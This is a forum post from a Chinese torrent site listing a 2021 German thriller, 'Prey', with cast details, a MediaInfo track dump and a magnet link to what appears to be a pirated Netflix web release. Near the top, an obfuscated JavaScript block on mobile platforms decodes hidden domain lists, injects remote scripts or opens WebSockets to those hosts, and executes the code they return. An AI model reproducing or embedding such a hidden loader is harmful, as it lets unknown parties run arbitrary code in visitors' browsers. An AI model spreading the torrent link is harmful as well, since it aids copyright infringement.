猎物[中文字幕].Prey.2021.1080p.NF.WEB-DL.DDP5.1.x264 6.64GB

版主小s 12天前 321

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 猎物

◎片 名 Prey

◎年 代 2021

◎产 地 德国

◎类 别 剧情 / 惊悚 / 冒险

◎语 言 德语

◎上映日期 2021-09-10(德国)

◎IMDb链接 https://www.imdb.com/title/tt15198608/

◎豆瓣链接 https://movie.douban.com/subject/35580146/

◎片 长 87分钟

◎演 员 大卫·克劳斯 David Kross (id:1040984)

汉诺·科夫勒 Hanno Koffler (id:1000754)

玛丽亚·艾维克 Maria Ehrich (id:1188532)

罗伯特·芬斯特 Robert Finster (id:1435206)

荣·吴 Yung Ngo (id:1426042)

利维娅?马特斯 Livia Matthes (id:1414389)

◎标 签 惊悚 / 德国 / 剧情 / 冒险 / 2021

◎简 介

在野外徒步旅行时,五位好友遭到神秘枪手的都追杀,陷入一场绝命逃亡之战

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 144234913568717039301318141997148362133 (0x6C82A247B7785D0F02763C17A01D5595)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.63 GiB

  8. Duration : 1 h 27 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 10.9 Mb/s

  11. Encoded date : UTC 2021-09-10 10:36:07

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 27 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 831 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.077

  37. Stream size : 2.34 GiB (35%)

  38. Writing library : x264 core 148 r2722 1b0121b

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=18.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 1 h 27 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 400 MiB (6%)

  57. Title : German

  58. Language : German

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3

  65. Format/Info : Enhanced AC-3

  66. Commercial name : Dolby Digital Plus

  67. Codec ID : A_EAC3

  68. Duration : 1 h 27 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 400 MiB (6%)

  77. Title : English

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : E-AC-3

  85. Format/Info : Enhanced AC-3

  86. Commercial name : Dolby Digital Plus

  87. Codec ID : A_EAC3

  88. Duration : 1 h 27 min

  89. Bit rate mode : Constant

  90. Bit rate : 640 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 400 MiB (6%)

  97. Title : Czech

  98. Language : Czech

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : E-AC-3

  105. Format/Info : Enhanced AC-3

  106. Commercial name : Dolby Digital Plus

  107. Codec ID : A_EAC3

  108. Duration : 1 h 27 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 400 MiB (6%)

  117. Title : French

  118. Language : French

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Audio #5

  123. ID : 6

  124. Format : E-AC-3

  125. Format/Info : Enhanced AC-3

  126. Commercial name : Dolby Digital Plus

  127. Codec ID : A_EAC3

  128. Duration : 1 h 27 min

  129. Bit rate mode : Constant

  130. Bit rate : 640 kb/s

  131. Channel(s) : 6 channels

  132. Channel layout : L R C LFE Ls Rs

  133. Sampling rate : 48.0 kHz

  134. Frame rate : 31.250 FPS (1536 SPF)

  135. Compression mode : Lossy

  136. Stream size : 400 MiB (6%)

  137. Title : Hungarian

  138. Language : Hungarian

  139. Service kind : Complete Main

  140. Default : No

  141. Forced : No


  142. Audio #6

  143. ID : 7

  144. Format : E-AC-3

  145. Format/Info : Enhanced AC-3

  146. Commercial name : Dolby Digital Plus

  147. Codec ID : A_EAC3

  148. Duration : 1 h 27 min

  149. Bit rate mode : Constant

  150. Bit rate : 640 kb/s

  151. Channel(s) : 6 channels

  152. Channel layout : L R C LFE Ls Rs

  153. Sampling rate : 48.0 kHz

  154. Frame rate : 31.250 FPS (1536 SPF)

  155. Compression mode : Lossy

  156. Stream size : 400 MiB (6%)

  157. Title : Italian

  158. Language : Italian

  159. Service kind : Complete Main

  160. Default : No

  161. Forced : No


  162. Audio #7

  163. ID : 8

  164. Format : E-AC-3

  165. Format/Info : Enhanced AC-3

  166. Commercial name : Dolby Digital Plus

  167. Codec ID : A_EAC3

  168. Duration : 1 h 27 min

  169. Bit rate mode : Constant

  170. Bit rate : 640 kb/s

  171. Channel(s) : 6 channels

  172. Channel layout : L R C LFE Ls Rs

  173. Sampling rate : 48.0 kHz

  174. Frame rate : 31.250 FPS (1536 SPF)

  175. Compression mode : Lossy

  176. Stream size : 400 MiB (6%)

  177. Title : Polish

  178. Language : Polish

  179. Service kind : Complete Main

  180. Default : No

  181. Forced : No


  182. Audio #8

  183. ID : 9

  184. Format : E-AC-3

  185. Format/Info : Enhanced AC-3

  186. Commercial name : Dolby Digital Plus

  187. Codec ID : A_EAC3

  188. Duration : 1 h 27 min

  189. Bit rate mode : Constant

  190. Bit rate : 640 kb/s

  191. Channel(s) : 6 channels

  192. Channel layout : L R C LFE Ls Rs

  193. Sampling rate : 48.0 kHz

  194. Frame rate : 31.250 FPS (1536 SPF)

  195. Compression mode : Lossy

  196. Stream size : 400 MiB (6%)

  197. Title : Brazilian Portuguese

  198. Language : Portuguese

  199. Service kind : Complete Main

  200. Default : No

  201. Forced : No


  202. Audio #9

  203. ID : 10

  204. Format : E-AC-3

  205. Format/Info : Enhanced AC-3

  206. Commercial name : Dolby Digital Plus

  207. Codec ID : A_EAC3

  208. Duration : 1 h 27 min

  209. Bit rate mode : Constant

  210. Bit rate : 640 kb/s

  211. Channel(s) : 6 channels

  212. Channel layout : L R C LFE Ls Rs

  213. Sampling rate : 48.0 kHz

  214. Frame rate : 31.250 FPS (1536 SPF)

  215. Compression mode : Lossy

  216. Stream size : 400 MiB (6%)

  217. Title : Spanish

  218. Language : Spanish

  219. Service kind : Complete Main

  220. Default : No

  221. Forced : No


  222. Audio #10

  223. ID : 11

  224. Format : E-AC-3

  225. Format/Info : Enhanced AC-3

  226. Commercial name : Dolby Digital Plus

  227. Codec ID : A_EAC3

  228. Duration : 1 h 27 min

  229. Bit rate mode : Constant

  230. Bit rate : 640 kb/s

  231. Channel(s) : 6 channels

  232. Channel layout : L R C LFE Ls Rs

  233. Sampling rate : 48.0 kHz

  234. Frame rate : 31.250 FPS (1536 SPF)

  235. Compression mode : Lossy

  236. Stream size : 400 MiB (6%)

  237. Title : European Spanish

  238. Language : Spanish

  239. Service kind : Complete Main

  240. Default : No

  241. Forced : No


  242. Audio #11

  243. ID : 12

  244. Format : E-AC-3

  245. Format/Info : Enhanced AC-3

  246. Commercial name : Dolby Digital Plus

  247. Codec ID : A_EAC3

  248. Duration : 1 h 27 min

  249. Bit rate mode : Constant

  250. Bit rate : 640 kb/s

  251. Channel(s) : 6 channels

  252. Channel layout : L R C LFE Ls Rs

  253. Sampling rate : 48.0 kHz

  254. Frame rate : 31.250 FPS (1536 SPF)

  255. Compression mode : Lossy

  256. Stream size : 400 MiB (6%)

  257. Title : Turkish

  258. Language : Turkish

  259. Service kind : Complete Main

  260. Default : No

  261. Forced : No


  262. Text #1

  263. ID : 13

  264. Format : UTF-8

  265. Codec ID : S_TEXT/UTF8

  266. Codec ID/Info : UTF-8 Plain Text

  267. Duration : 1 h 19 min

  268. Bit rate : 24 b/s

  269. Count of elements : 639

  270. Stream size : 14.2 KiB (0%)

  271. Title : English

  272. Language : English

  273. Default : Yes

  274. Forced : No


  275. Text #2

  276. ID : 14

  277. Format : UTF-8

  278. Codec ID : S_TEXT/UTF8

  279. Codec ID/Info : UTF-8 Plain Text

  280. Duration : 1 h 26 min

  281. Bit rate : 42 b/s

  282. Count of elements : 654

  283. Stream size : 27.1 KiB (0%)

  284. Title : Arabic

  285. Language : Arabic

  286. Default : No

  287. Forced : No


  288. Text #3

  289. ID : 15

  290. Format : UTF-8

  291. Codec ID : S_TEXT/UTF8

  292. Codec ID/Info : UTF-8 Plain Text

  293. Duration : 1 h 26 min

  294. Bit rate : 26 b/s

  295. Count of elements : 644

  296. Stream size : 16.8 KiB (0%)

  297. Title : Chinese Simplified

  298. Language : Chinese

  299. Default : No

  300. Forced : No


  301. Text #4

  302. ID : 16

  303. Format : UTF-8

  304. Codec ID : S_TEXT/UTF8

  305. Codec ID/Info : UTF-8 Plain Text

  306. Duration : 1 h 26 min

  307. Bit rate : 23 b/s

  308. Count of elements : 646

  309. Stream size : 14.9 KiB (0%)

  310. Title : Chinese Traditional

  311. Language : Chinese

  312. Default : No

  313. Forced : No


  314. Text #5

  315. ID : 17

  316. Format : UTF-8

  317. Codec ID : S_TEXT/UTF8

  318. Codec ID/Info : UTF-8 Plain Text

  319. Duration : 1 h 26 min

  320. Bit rate : 20 b/s

  321. Count of elements : 637

  322. Stream size : 13.2 KiB (0%)

  323. Title : Croatian

  324. Language : Croatian

  325. Default : No

  326. Forced : No


  327. Text #6

  328. ID : 18

  329. Format : UTF-8

  330. Codec ID : S_TEXT/UTF8

  331. Codec ID/Info : UTF-8 Plain Text

  332. Duration : 1 h 26 min

  333. Bit rate : 22 b/s

  334. Count of elements : 645

  335. Stream size : 13.9 KiB (0%)

  336. Title : Czech

  337. Language : Czech

  338. Default : No

  339. Forced : No


  340. Text #7

  341. ID : 19

  342. Format : UTF-8

  343. Codec ID : S_TEXT/UTF8

  344. Codec ID/Info : UTF-8 Plain Text

  345. Duration : 1 h 26 min

  346. Bit rate : 23 b/s

  347. Count of elements : 615

  348. Stream size : 14.6 KiB (0%)

  349. Title : Danish

  350. Language : Danish

  351. Default : No

  352. Forced : No


  353. Text #8

  354. ID : 20

  355. Format : UTF-8

  356. Codec ID : S_TEXT/UTF8

  357. Codec ID/Info : UTF-8 Plain Text

  358. Duration : 1 h 26 min

  359. Bit rate : 19 b/s

  360. Count of elements : 563

  361. Stream size : 12.5 KiB (0%)

  362. Title : Dutch

  363. Language : Dutch

  364. Default : No

  365. Forced : No


  366. Text #9

  367. ID : 21

  368. Format : UTF-8

  369. Codec ID : S_TEXT/UTF8

  370. Codec ID/Info : UTF-8 Plain Text

  371. Duration : 1 h 26 min

  372. Bit rate : 23 b/s

  373. Count of elements : 587

  374. Stream size : 14.6 KiB (0%)

  375. Title : Finnish

  376. Language : Finnish

  377. Default : No

  378. Forced : No


  379. Text #10

  380. ID : 22

  381. Format : UTF-8

  382. Codec ID : S_TEXT/UTF8

  383. Codec ID/Info : UTF-8 Plain Text

  384. Duration : 1 h 26 min

  385. Bit rate : 22 b/s

  386. Count of elements : 580

  387. Stream size : 14.2 KiB (0%)

  388. Title : French

  389. Language : French

  390. Default : No

  391. Forced : No


  392. Text #11

  393. ID : 23

  394. Format : UTF-8

  395. Codec ID : S_TEXT/UTF8

  396. Codec ID/Info : UTF-8 Plain Text

  397. Duration : 1 h 26 min

  398. Bit rate : 45 b/s

  399. Count of elements : 888

  400. Stream size : 28.9 KiB (0%)

  401. Title : German

  402. Language : German

  403. Default : No

  404. Forced : No


  405. Text #12

  406. ID : 24

  407. Format : UTF-8

  408. Codec ID : S_TEXT/UTF8

  409. Codec ID/Info : UTF-8 Plain Text

  410. Duration : 1 h 1 min

  411. Bit rate : 0 b/s

  412. Count of elements : 11

  413. Stream size : 377 Bytes (0%)

  414. Title : German (Forced)

  415. Language : German

  416. Default : No

  417. Forced : Yes


  418. Text #13

  419. ID : 25

  420. Format : UTF-8

  421. Codec ID : S_TEXT/UTF8

  422. Codec ID/Info : UTF-8 Plain Text

  423. Duration : 1 h 26 min

  424. Bit rate : 37 b/s

  425. Count of elements : 637

  426. Stream size : 23.7 KiB (0%)

  427. Title : Greek

  428. Language : Greek

  429. Default : No

  430. Forced : No


  431. Text #14

  432. ID : 26

  433. Format : UTF-8

  434. Codec ID : S_TEXT/UTF8

  435. Codec ID/Info : UTF-8 Plain Text

  436. Duration : 1 h 26 min

  437. Bit rate : 37 b/s

  438. Count of elements : 644

  439. Stream size : 23.4 KiB (0%)

  440. Title : Hebrew

  441. Language : Hebrew

  442. Default : No

  443. Forced : No


  444. Text #15

  445. ID : 27

  446. Format : UTF-8

  447. Codec ID : S_TEXT/UTF8

  448. Codec ID/Info : UTF-8 Plain Text

  449. Duration : 1 h 26 min

  450. Bit rate : 22 b/s

  451. Count of elements : 642

  452. Stream size : 14.1 KiB (0%)

  453. Title : Hungarian

  454. Language : Hungarian

  455. Default : No

  456. Forced : No


  457. Text #16

  458. ID : 28

  459. Format : UTF-8

  460. Codec ID : S_TEXT/UTF8

  461. Codec ID/Info : UTF-8 Plain Text

  462. Duration : 1 h 26 min

  463. Bit rate : 22 b/s

  464. Count of elements : 643

  465. Stream size : 14.3 KiB (0%)

  466. Title : Indonesian

  467. Language : Indonesian

  468. Default : No

  469. Forced : No


  470. Text #17

  471. ID : 29

  472. Format : UTF-8

  473. Codec ID : S_TEXT/UTF8

  474. Codec ID/Info : UTF-8 Plain Text

  475. Duration : 1 h 26 min

  476. Bit rate : 22 b/s

  477. Count of elements : 643

  478. Stream size : 13.9 KiB (0%)

  479. Title : Italian

  480. Language : Italian

  481. Default : No

  482. Forced : No


  483. Text #18

  484. ID : 30

  485. Format : UTF-8

  486. Codec ID : S_TEXT/UTF8

  487. Codec ID/Info : UTF-8 Plain Text

  488. Duration : 1 h 26 min

  489. Bit rate : 21 b/s

  490. Count of elements : 725

  491. Stream size : 13.8 KiB (0%)

  492. Title : Japanese

  493. Language : Japanese

  494. Default : No

  495. Forced : No


  496. Text #19

  497. ID : 31

  498. Format : UTF-8

  499. Codec ID : S_TEXT/UTF8

  500. Codec ID/Info : UTF-8 Plain Text

  501. Duration : 1 h 26 min

  502. Bit rate : 28 b/s

  503. Count of elements : 673

  504. Stream size : 18.1 KiB (0%)

  505. Title : Korean

  506. Language : Korean

  507. Default : No

  508. Forced : No


  509. Text #20

  510. ID : 32

  511. Format : UTF-8

  512. Codec ID : S_TEXT/UTF8

  513. Codec ID/Info : UTF-8 Plain Text

  514. Duration : 1 h 26 min

  515. Bit rate : 21 b/s

  516. Count of elements : 638

  517. Stream size : 13.6 KiB (0%)

  518. Title : Malay

  519. Language : Malay

  520. Default : No

  521. Forced : No


  522. Text #21

  523. ID : 33

  524. Format : UTF-8

  525. Codec ID : S_TEXT/UTF8

  526. Codec ID/Info : UTF-8 Plain Text

  527. Duration : 1 h 26 min

  528. Bit rate : 21 b/s

  529. Count of elements : 624

  530. Stream size : 13.5 KiB (0%)

  531. Title : Norwegian Bokmal

  532. Language : Norwegian Bokmal

  533. Default : No

  534. Forced : No


  535. Text #22

  536. ID : 34

  537. Format : UTF-8

  538. Codec ID : S_TEXT/UTF8

  539. Codec ID/Info : UTF-8 Plain Text

  540. Duration : 1 h 26 min

  541. Bit rate : 21 b/s

  542. Count of elements : 643

  543. Stream size : 13.5 KiB (0%)

  544. Title : Polish

  545. Language : Polish

  546. Default : No

  547. Forced : No


  548. Text #23

  549. ID : 35

  550. Format : UTF-8

  551. Codec ID : S_TEXT/UTF8

  552. Codec ID/Info : UTF-8 Plain Text

  553. Duration : 1 h 26 min

  554. Bit rate : 22 b/s

  555. Count of elements : 635

  556. Stream size : 14.3 KiB (0%)

  557. Title : Portuguese

  558. Language : Portuguese

  559. Default : No

  560. Forced : No


  561. Text #24

  562. ID : 36

  563. Format : UTF-8

  564. Codec ID : S_TEXT/UTF8

  565. Codec ID/Info : UTF-8 Plain Text

  566. Duration : 1 h 26 min

  567. Bit rate : 21 b/s

  568. Count of elements : 642

  569. Stream size : 13.7 KiB (0%)

  570. Title : Brazilian Portuguese

  571. Language : Portuguese

  572. Default : No

  573. Forced : No


  574. Text #25

  575. ID : 37

  576. Format : UTF-8

  577. Codec ID : S_TEXT/UTF8

  578. Codec ID/Info : UTF-8 Plain Text

  579. Duration : 1 h 26 min

  580. Bit rate : 24 b/s

  581. Count of elements : 611

  582. Stream size : 15.6 KiB (0%)

  583. Title : Romanian

  584. Language : Romanian

  585. Default : No

  586. Forced : No


  587. Text #26

  588. ID : 38

  589. Format : UTF-8

  590. Codec ID : S_TEXT/UTF8

  591. Codec ID/Info : UTF-8 Plain Text

  592. Duration : 1 h 26 min

  593. Bit rate : 37 b/s

  594. Count of elements : 643

  595. Stream size : 23.8 KiB (0%)

  596. Title : Russian

  597. Language : Russian

  598. Default : No

  599. Forced : No


  600. Text #27

  601. ID : 39

  602. Format : UTF-8

  603. Codec ID : S_TEXT/UTF8

  604. Codec ID/Info : UTF-8 Plain Text

  605. Duration : 1 h 26 min

  606. Bit rate : 22 b/s

  607. Count of elements : 638

  608. Stream size : 14.5 KiB (0%)

  609. Title : Spanish

  610. Language : Spanish

  611. Default : No

  612. Forced : No


  613. Text #28

  614. ID : 40

  615. Format : UTF-8

  616. Codec ID : S_TEXT/UTF8

  617. Codec ID/Info : UTF-8 Plain Text

  618. Duration : 1 h 26 min

  619. Bit rate : 22 b/s

  620. Count of elements : 622

  621. Stream size : 14.2 KiB (0%)

  622. Title : European Spanish

  623. Language : Spanish

  624. Default : No

  625. Forced : No


  626. Text #29

  627. ID : 41

  628. Format : UTF-8

  629. Codec ID : S_TEXT/UTF8

  630. Codec ID/Info : UTF-8 Plain Text

  631. Duration : 1 h 26 min

  632. Bit rate : 22 b/s

  633. Count of elements : 644

  634. Stream size : 14.2 KiB (0%)

  635. Title : Swedish

  636. Language : Swedish

  637. Default : No

  638. Forced : No


  639. Text #30

  640. ID : 42

  641. Format : UTF-8

  642. Codec ID : S_TEXT/UTF8

  643. Codec ID/Info : UTF-8 Plain Text

  644. Duration : 1 h 26 min

  645. Bit rate : 61 b/s

  646. Count of elements : 652

  647. Stream size : 38.9 KiB (0%)

  648. Title : Thai

  649. Language : Thai

  650. Default : No

  651. Forced : No


  652. Text #31

  653. ID : 43

  654. Format : UTF-8

  655. Codec ID : S_TEXT/UTF8

  656. Codec ID/Info : UTF-8 Plain Text

  657. Duration : 1 h 26 min

  658. Bit rate : 23 b/s

  659. Count of elements : 632

  660. Stream size : 14.9 KiB (0%)

  661. Title : Turkish

  662. Language : Turkish

  663. Default : No

  664. Forced : No


  665. Text #32

  666. ID : 44

  667. Format : UTF-8

  668. Codec ID : S_TEXT/UTF8

  669. Codec ID/Info : UTF-8 Plain Text

  670. Duration : 1 h 26 min

  671. Bit rate : 36 b/s

  672. Count of elements : 644

  673. Stream size : 23.3 KiB (0%)

  674. Title : Ukrainian

  675. Language : Ukrainian

  676. Default : No

  677. Forced : No


  678. Text #33

  679. ID : 45

  680. Format : UTF-8

  681. Codec ID : S_TEXT/UTF8

  682. Codec ID/Info : UTF-8 Plain Text

  683. Duration : 1 h 26 min

  684. Bit rate : 32 b/s

  685. Count of elements : 615

  686. Stream size : 20.8 KiB (0%)

  687. Title : Vietnamese

  688. Language : Vietnamese

  689. Default : No

  690. Forced : No


TAGS 冒险 剧情 惊悚

磁力链:
  • magnet:?xt=urn:btih:F9A76E56F0CAAFFC046C3D6945538D4A16A2CD86
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖